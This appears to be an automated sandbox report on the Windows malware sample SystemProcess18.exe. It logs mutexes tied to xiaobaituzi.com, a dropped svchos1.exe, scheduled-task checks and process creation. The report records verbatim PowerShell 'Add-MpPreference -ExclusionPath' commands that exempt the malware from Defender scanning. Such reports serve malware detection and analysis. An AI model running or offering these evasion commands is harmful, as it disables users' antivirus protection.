Code function: 28_2_035DF0E0 Sleep,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,

28_2_035DF0E0

Source: C:\Users\user\Desktop\SystemProcess18.exe

File created: C:\Users\Public\Documents\shell.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\SystemProcess18.exe	Mutant created: \Sessions\1\BaseNamedObjects\xiaobaituzi.com:443:MyService1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Users\user\Desktop\SystemProcess18.exe	Mutant created: \Sessions\1\BaseNamedObjects\xiaobaituzi.com:8080:MyService
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyw30vd4.vdq.ps1

Source: SystemProcess18.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SystemProcess18.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SystemProcess18.exe	Virustotal: Detection: 50%
Source: SystemProcess18.exe	ReversingLabs: Detection: 41%

Source: SystemProcess18.exe	String found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al
Source: SystemProcess18.exe	String found in binary or memory: le> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <Al

Source: C:\Users\user\Desktop\SystemProcess18.exe

File read: C:\Users\user\Desktop\SystemProcess18.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Documents\MM\svchos1.exe C:\Users\Public\Documents\MM\svchos1.exe
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Users\Public\Documents\MM\svchos1.exe "C:\Users\Public\Documents\MM\svchos1.exe"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Users\user\Desktop\SystemProcess18.exe "C:\Users\user\Desktop\SystemProcess18.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
